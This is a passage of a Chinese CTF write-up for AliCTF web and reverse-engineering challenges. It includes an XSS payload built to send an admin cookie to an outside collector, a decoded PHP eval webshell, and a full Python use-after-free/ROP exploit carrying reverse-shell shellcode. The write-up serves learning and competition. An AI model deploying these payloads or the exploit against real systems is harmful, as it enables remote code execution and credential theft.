$key; if($key == '_POST' &amp;&amp; ~$value['alibaba']['security'] == -2347230984235 &amp;&amp; strlen($value['alibaba']['security']) &gt;= 0){ find_flag($value['alibaba']['security']); }else{ exit('error'); } } } } } function find_flag(){ $key = 'FLAG'; echo $key; } ?&gt; \&lt;html&gt; &lt;body&gt; &lt;!-- http://web400b.alictf.com/alibaba_CTF_security/--&gt; &lt;/body&gt; \&lt;/html&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">首先可以知道是通过POST请求,加入以下代码测试输出,</span> </p> <pre><code> foreach(Array('_GET', '_POST', '_COOKIE') as $_REQUEST){ var_dump($key); foreach($$_REQUEST as $key =&gt; $value){ var_dump($value);</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">在POST参数为_POST[alibaba][security]=xxx时可以正确赋值并满足$key == &#39;_POST&#39; &amp;&amp; strlen($value[&#39;alibaba&#39;][&#39;security&#39;]) &gt;= 0</span> </p> <p class="md_block"> <span class="md_line">之后便要通过~$value[&#39;alibaba&#39;][&#39;security&#39;] == -2347230984235</span> </p> <p class="md_block"> <span class="md_line">int型在32位机器上最大为-2116126678~2147483647,肯定有绕过思路,想法是==比较过程中,左右两边类型不同会将右边的float型转换为int型,与左边的int型比较,这样可能可以Bypass,刚要测试,看到群消息说切换为64位,就赶紧秒了...</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-400-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">接着试了一下刚刚的想法,还是没通过.坐等官方的Wannabe.</span> </p> <hr> <h5 id="toc_9">WebA-500</h5> <blockquote> <p class="md_block"> <span class="md_line"> 最喜欢你们这些跨站师 <br /></span> <span class="md_line"> http://web500a.alictf.com/e936a8a8ff906c8f057ed84bf4332585.php </span> </p> </blockquote> <pre><code>Function("‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‍‍‌‌‍‍‌‍‍‍‌‌‍‍‌‍‌‍‌‌‌‌‍‍‍‍‌‍‍‌‌‌‌‍‌‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‍‍‌‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‌‍‌‍‍‌‌‌‌‍‌‍‍‌‍‌‌‍‌‍‍‌‌‍‍‍‌‍‍‌‍‍‌‌‍‍‍‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‌‌‌‍‌‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‍‍‍‍‍‌‌‌‍‌‍‍‍‌‍‌‌‌‌‍‍‌‍‌‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‍‌‍‌‌‌‍‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‌‍‌‌‌‍‌‍‍‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‍‍‌‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‍‌‍‍‌‍‌‌‌‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‍‌‌".replace(/.{8}/g,function(u){return String.fromCharCode(parseInt(u.replace(/\u200c/g,1).replace(/\u200d/g,0),2))}))(); String.prototype.remove = function(start, length) { var l = this.slice(0, start); var r = this.slice(start+length); return l+r; } function xescape(input) { rawinput = input; input = input.replace(/&lt;([a-zA-Z])/g, '&lt;_$1'); input = input.toUpperCase(); input = input.remove(2,1); if(rawinput.length != input.length){input = "";} return "&lt;h1&gt;"+input+"&lt;h1&gt;"; } document.write(xescape('')); &lt;br&gt;请使用chrome做测试,flag在管理员的cookie中&lt;br&gt; &lt;br&gt;example:php?code=xxxxx&lt;br&gt; &lt;a href="4a924593e74f6b64d205fe248cefad33.php"&gt;url提交&lt;/a&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">首先绕过</span> </p> <pre><code>Function("xxxxx‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‍‍‌‌‍‍‌‍‍‍‌‌‍‍‌‍‌‍‌‌‌‌‍‍‍‍‌‍‍‌‌‌‌‍‌‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‍‍‌‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‌‍‌‍‍‌‌‌‌‍‌‍‍‌‍‌‌‍‌‍‍‌‌‍‍‍‌‍‍‌‍‍‌‌‍‍‍‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‌‌‌‍‌‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‍‍‍‍‍‌‌‌‍‌‍‍‍‌‍‌‌‌‌‍‍‌‍‌‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‍‌‍‌‌‌‍‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‌‍‌‌‌‍‌‍‍‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‍‍‌‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‍‌‍‍‌‍‌‌‌‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‍‌‌".replace(/.{8}/g,function(u){return String.fromCharCode(parseInt(u.replace(/\u200c/g,1).replace(/\u200d/g,0),2))}))();</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">防止跳转,这里xxxxx因为之前的内容没能保存下载(出乱码了:( ),不能复现</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-500-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">函数会检查url最后是否有helloalibaba,在location.hash里加上#helloalibaba即可避免跳转.</span> </p> <p class="md_block"> <span class="md_line">xescape函数被官方修改过,如果传入类似a&lt;img,第一步会被变成a&lt;_img,remove(2,1)后删除下划线,长度没有变化,转换成大写部分使用html编码绕过.</span> </p> <p class="md_block"> <span class="md_line">payload:</span> </p> <pre><code>http://web500a.alictf.com/e936a8a8ff906c8f057ed84bf4332585.php?code=a&lt;\img src=1 onerror=&amp;#101&amp;#118&amp;#97&amp;#108&amp;#40&amp;#39\\144\\157\\143\\165\\155\\145\\156\\164\\56\\167\\162\\151\\164\\145\\50\\47xxxx和谐xxxx\\75\\150\\164\\164\\160\\72\\57\\57\\170\\163\\163\\141\\156xxxx和谐xxxx\\163\\143\\162\\151\\160\\164\\76\\47\\51&amp;#39)&gt;#helloalibaba</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">url编码后提交收信,得到flag.</span> </p> <hr> <h4 id="toc_10">0x03 Reverse</h4> <h5 id="toc_11">Reverse-100</h5> <blockquote> <p class="md_block"> <span class="md_line">ch1.exe会把获取到的信息加密存储到&quot;secret.db&quot;文件中。<br /></span> <span class="md_line">找出加密的key,加密的key提交服务器即为得分的flag.<br /></span> <span class="md_line">题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">ch1.exe这个程序会搜集主机信息,OD动态调试<br /></span> <span class="md_line">获取本地测试主机信息后会将主机信息和这个字符串进行加密</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-100-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">之后在函数sub_4225e0中进行加密</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-100-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">不过不需要分析加密过程了,字串</span> </p> <pre><code>19dlo*%AO+3i87BaweTw.lc!)61K{9^5</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">就是flag</span> </p> <hr> <h5 id="toc_12">Reverse-200</h5> <blockquote> <p class="md_block"> <span class="md_line">逆向分析Ch3.exe,点击Ch3.exe上的button会得倒一个key。<br /></span> <span class="md_line">程序好像有问题,请修改并给出结果。<br /></span> <span class="md_line">题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">运行Ch2.exe,同目录下的flag.crypt文件大小会从1kb变为0kb,猜想解题思路要么是程序提供解密函数需要手工定向,要么是逆向算法.</span> </p> <p class="md_block"> <span class="md_line">没有找到decrypt函数,猜想是要逆向算法,运行几次后发现同目录下需要有一个flag.txt,于是把flag.crypt文件修改为flag.txt,进入到encrypt函数。</span> </p> <p class="md_block"> <span class="md_line">在IDA Pro中定位,观察到有一些干扰指令的存在</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">用010 editor全部替换为\x90之后,IDA Pro可以显示正常的代码,F5查看反编译情况,分析后发现子函数sub_00401000中包含了加密算法</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-200-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">关键的算法只有这几行</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-200-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">用UltraEdit查看flag.crypt文件,大小为40个字节,结合算法分析,是由20个字节每个字节的高位和低位扩张得来.<br /></span> <span class="md_line">还原得到flag</span> </p> <pre><code>a1dlo3i87@vt(#$^~kb25-+8=csm,%*4</code></pre> <!--block_code_end--> <hr> <h5 id="toc_13">Reverse-300</h5> <blockquote> <p class="md_block"> <span class="md_line">逆向分析Ch3.exe,点击Ch3.exe上的button会得倒一个key。<br /></span> <span class="md_line">程序好像有问题,请修改并给出结果。<br /></span> <span class="md_line">题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">X64且加了壳,网上找到UPXShell.exe把壳给脱了,在崩溃点向上找,发现一段代码:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-300-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">很明显,程序显示加载DecryptDll.dll,然后寻找dll中的RSADecrypt函数,最后意图调用它.</span> </p> <p class="md_block"> <span class="md_line">但是没有DecryptDll.dll,自然就寻找不到RSADecrypt函数,就会发生一个错误的调用.</span> </p> <p class="md_block"> <span class="md_line">找来找去费了好长时间,就试了下是否在程序里面,果段拉进binwalk</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-300-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">提取出来后拉进IDA一看,就导出了RSADecrypt函数</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-300-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">在执行时修改下R8寄存器的值使其指向一块可写内存,调用后flag就会出现在R8寄存器指向的地方.</span> </p> <hr> <h5 id="toc_14">Reverse-400</h5> <blockquote> <p class="md_block"> <span class="md_line">Casper使用远控木马的控制端生成了一个木马trojan.exe。<br /></span> <span class="md_line"> 但Casper发现这个远控木马控制端似乎有一个可疑的下载接口。<br /></span> <span class="md_line"> 可以通过木马trojan.exe去调用这个接口下载到控制端的secret.rar文件。<br /></span> <span class="md_line"> 让我们来尝识下载控制端的secret.rar文件吧,看看有什么秘密。<br /></span> <span class="md_line"> hint:如果找到下载接口,下载secret.rar不成功,可以试试连接88端口。<br /></span> <span class="md_line"> 题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">Reverse400费了好长时间,最后半小时才弄出来.</span> </p> <p class="md_block"> <span class="md_line">一开始想的太复杂,想从控制端和木马的通信协议入手,然后再分析控制端和木马对于不同数据的执行情况.结果弄了好久还是没搞太明白...</span> </p> <p class="md_block"> <span class="md_line">最后无耐队友建议直接修改sub_405D10函数中的case跳转试下,虽然很早就知道那条路径是处理Secret.rar文件的函数,但一直以为那是下载后的处理流程,而真正下载的流程应该在前面.谁知道竟然真的可以...</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-400-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">修改后得到Secret.rar</span> </p> <p class="md_block"> <span class="md_line">解压后是web发给队友,愉快的在最后45分钟收到文件.打开居然是html,看到</span> </p> <pre><code>&lt;?php include "img/aliyun.png" ?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">图片有内涵,得到</span> </p> <pre><code>&lt;?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "&lt;", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&amp;", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", "&gt;", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");$order=array(59, 71, 73, 13, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 0, 24, 72, 70, 28, 48, 19, 12, 0, 7, 5, 37, 0, 24, 88, 87, 0, 24, 72, 12, 28, 48, 19, 66, 63, 50, 5, 49, 42, 25, 37, 91, 63, 24, 90, 87, 93, 18, 87, 66, 28, 18, 45, 37, 28, 48, 19, 66, 63, 50, 5, 49, 42, 25, 37, 91, 63, 24, 90, 87, 93, 18, 87, 40, 28, 18, 17, 5, 42, 25, 37, 91, 0, 12, 25, 87, 0, 24, 72, 91, 28, 48, 19, 49, 11, 25, 37, 91, 63, 75, 68, 87, 42, 24, 60, 87, 93, 18, 87, 5, 28, 48, 19, 66, 63, 50, 5, 49, 42, 25, 37, 91, 63, 24, 90, 87, 42, 24, 60, 87, 63, 18, 58, 87, 93, 18, 0, 37, 28, 48, 19, 66, 0, 25, 37, 91, 63, 24, 90, 87, 42, 24, 60, 87, 0, 24, 72, 91, 28, 48, 19, 40, 42, 25, 5, 70, 42, 50, 5, 70, 63, 7, 37, 91, 63, 83, 68, 87, 42, 24, 60, 87, 93, 18, 11, 66, 28, 18, 81, 7, 28, 48, 19, 7, 0, 7, 37, 91, 63, 18, 43, 87, 93, 18, 81, 70, 28, 18, 17, 37, 0, 50, 37, 91, 63, 83, 63, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 0, 24, 72, 70, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 37, 0, 18, 58, 87, 63, 24, 50, 87, 0, 24, 17, 5, 28, 48, 19, 40, 63, 7, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 18, 17, 37, 63, 58, 5, 7, 0, 25, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 48, 19, 49, 63, 58, 5, 37, 0, 18, 58, 87, 93, 18, 0, 7, 28, 48, 19, 40, 11, 7, 37, 91, 63, 66, 50, 87, 93, 18, 1, 31, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 18, 75, 49, 28, 48, 19, 12, 0, 25, 37, 91, 0, 12, 50, 87, 93, 18, 11, 37, 28, 48, 19, 7, 63, 50, 5, 70, 63, 7, 37, 91, 63, 75, 63, 87, 93, 18, 81, 70, 28, 48, 19, 40, 0, 58, 5, 70, 63, 7, 37, 91, 63, 83, 68, 87, 42, 24, 60, 87, 93, 18, 11, 66, 28, 48, 19, 66, 0, 25, 5, 91, 0, 7, 37, 91, 63, 18, 43, 87, 93, 18, 81, 70, 28, 18, 17, 37, 0, 50, 5, 70, 42, 25, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 48, 19, 40, 0, 7, 37, 91, 63, 75, 1, 87, 0, 24, 72, 70, 80, 58, 66, 3, 86, 24, 14, 19, 6, 11, 73, 73, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47); $do_me=""; for($i=0;$i&lt;count($order);$i++) {$do_me=$do_me.$terms[$order[$i]];} echo $do_me; ?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">好熟悉,中间思路请参考http://drops.wooyun.org/tips/2988</span> </p> <p class="md_block"> <span class="md_line">自己解码也很简单,得到</span> </p> <pre><code>if(isset($_POST["\109\x33\110\103\x44\79\x54\x74\51\x44\79\x54\x76\109\x35\108\x7A\x6B\97\x70\x44\79\x54\97\49\x31\x41\x54\97\108\x69\98\97\x62\97\x44\65\x53\x48\x69\110\x63\x44\79\x54\99\x6F\109"])) { eval(base64_decode($_POST["\109\51\110\x67\x44\79\x54\116\51\x44\79\x54\x76\109\x35\x6C\x7A\x6B\97\x70\x44\79\x54\97\x31\x31\x41\x54\97\x6C\x69\x62\97\x62\97\x44\x41\83\x48\x69\110\99\x44\79\x54\x63\x6F\109"])); }</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">默默的echo发现不对,颤栗的双手默默的看着解不出来的值,说好的八进制怎么会有9呢...队友说,不要太认真,把他当10进制ASCII看待吧...于是我就默默信了...</span> </p> <p class="md_block"> <span class="md_line">最终三个人得到不同的奇葩版本,一综合flag就有了</span> </p> <pre><code>m3ngD0Tt3D0Tvm5lzkapD0Ta11ATalibabaa11ATalibabaDASHncD0Tcom m3ng.t3.vm5lzkap.a11@alibabaa11@alibaba-nc.com m3ng.t3.vm5lzkap.a11@alIbaba-inc.com m3ng.t3.vm5lzkap.a11@alibaba-inc.com</code></pre> <!--block_code_end--> <hr> <h5 id="toc_15">Reverse-500</h5> <blockquote> <p class="md_block"> <span class="md_line">请分析Ch5.exe,该程序在reverse500.alictf.com上监听55555端口且存在多个漏洞。<br /></span> <span class="md_line">尝试利用这些漏洞控制Ch5.exe去读取服务端C盘根目录下的succ.txt内容并提交。<br /></span> <span class="md_line">目标操作系统win2008-sp2 / x32。<br /></span> <span class="md_line">题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">拉进IDA中分析函数流程.程序accept连接后开启一个线程,线程首先建立一个大小为1024字节的对象A,然后recv1280字节数据,进入sub_401620函数</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">在sub_401620函数中,程序对接受数据4-8字节进行判断</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">当v10为0x2222时call进sub_401270函数</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">在sub_401270函数中,程序首先向对象A+4的偏移地址复制0x80字节数据.然后从对象A+4的偏移开始读取又发送数据+12的数量的字节数发向客户端.而对象分配后</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-05.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">在对象的0x84,0x88,0x8c地址出存放了kernel32,ntdll和对象的地址.所以这个内存泄漏漏洞用来过ASLR.</span> </p> <p class="md_block"> <span class="md_line">当v10为0x3333时call进sub_401380函数</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-06.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">该函数中sub_401550函数把对象A给释放了,然后有按照接受数据指定大小分配了一个空间.UAF</span> </p> <p class="md_block"> <span class="md_line">当v10为0x5555时调用对象A中的某个虚函数</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-07.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">结合上步的UAF用来获得任意代码执行.首先根据泄漏的基址过ALSR和构造ROP过DEP.</span> </p> <p class="md_block"> <span class="md_line">Exp如下</span> </p> <pre><code>#coding:utf-8 from socket import * import struct s = socket(AF_INET, SOCK_STREAM) #s.connect(('192.168.206.133', 55555)) s.connect(('42.120.63.122', 55555)) #leak memory offset = '\x0c\x00\x00\x00' data_type = struct.pack('I', 0x2222) malloc_size = struct.pack('I', 0x400 + 0xc + 4) send_data = offset + data_type send_data += '\x90'*(0x500 - len(send_data)) s.send(send_data) recv_data = s.recv(1024) kernel32_base = struct.unpack('I', recv_data[0x80:0x84])[0] nt_base = struct.unpack('I', recv_data[0x84:0x88])[0] object_add = struct.unpack('I', recv_data[0x88:0x8c])[0] print 'address of kernel32,ntdll,object are', hex(kernel32_base), hex(nt_base), hex(object_add) #UAF offset = struct.pack('I', 0x100) data_type = struct.pack('I', 0x3333) nop = '\x90' * (0x100 - 8) malloc_size = struct.pack('I', 0x400 + 0x100 + 4) send_data = offset + data_type + nop+ malloc_size send_data += struct.pack('I', object_add+4) send_data += '\x90'*8 #virtualprotect send_data += struct.pack('I', kernel32_base+0x1DC3) #xchg eax,esp; pop; pop; pop; ret 4 send_data += struct.pack('I', nt_base + 0x7907) new_object_offset = len(offset + data_type + nop+ malloc_size) send_data += struct.pack('I', object_add + 0x164-new_object_offset) send_data += struct.pack('I', object_add + 0x164-new_object_offset) send_data += struct.pack('I', 0x1000) send_data += '\x40\x00\x00\x00' send_data += struct.pack('I', object_add) send_data += '\x90'*(0x164 - len(send_data)) shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" shellcode += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" shellcode += "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" shellcode += "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" shellcode += "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" shellcode += "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" shellcode += "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" shellcode += "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" shellcode += "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" shellcode += "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" shellcode += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" shellcode += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" shellcode += "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" shellcode += "\x68\x17\x58\xe5\x74\x68\x02\x00\xfc\x15\x89\xe6\x6a\x10\x56" shellcode += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" shellcode += "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" shellcode += "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56" shellcode += "\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" shellcode += "\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" shellcode += "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80" shellcode += "\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"; send_data += shellcode send_data += '\x90'*(0x500 - len(send_data)) s.send(send_data) print s.recv(1024) #code excute offset = '\x0c\x00\x00\x00' data_type = struct.pack('I', 0x5555) malloc_size = struct.pack('I', 0x400 + 0xc + 4) send_data = offset + data_type send_data += '\x90'*(0x500 - len(send_data)) s.send(send_data) print s.recv(1024)</code></pre> <!--block_code_end--> <hr> <h4 id="toc_16">0x04 WebB</h4> <h5 id="toc_17">WEBB-100</h5> <blockquote> <p class="md_block"> <span class="md_line">登录进来以后<br /></span> <span class="md_line">http://web100b.alictf.com/3ef067863a6db0a7fc218aceaee9366b.php</span> </p> </blockquote> <p class="md_block"> <span class="md_line">登陆之后抓包,可以看到hi xbb(熊宝宝?),然后Cookie有username,isadmin,修改都会出错(敢不敢按照程序来),Sign=df00ea56c4d2e709dbacf0eddf00ea56469b9e30</span> </p> <p class="md_block"> <span class="md_line">组合修改,Sign掐指一算40位,仔细一盯有重复,去掉前8位解码MD5为xbb0</span> </p> <p class="md_block"> <span class="md_line">然后构造admin1即可</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-100-01.png" alt="img" title="" ></span> </p> <hr> <h5 id="toc_18">WEBB-200</h5> <blockquote> <p class="md_block"> <span class="md_line">Casper写了一个安全的获取页面响应的接口给大家用,他真的安全吗?<br /></span> <span class="md_line">http://web200b.alictf.com/5b03e4d1a8cefc5121e1c1c0dd9b1cdc.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">黑盒脑洞,试了很久没有相出所以然,以为是curl -i的各种解法,各种查资料得到这个</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" 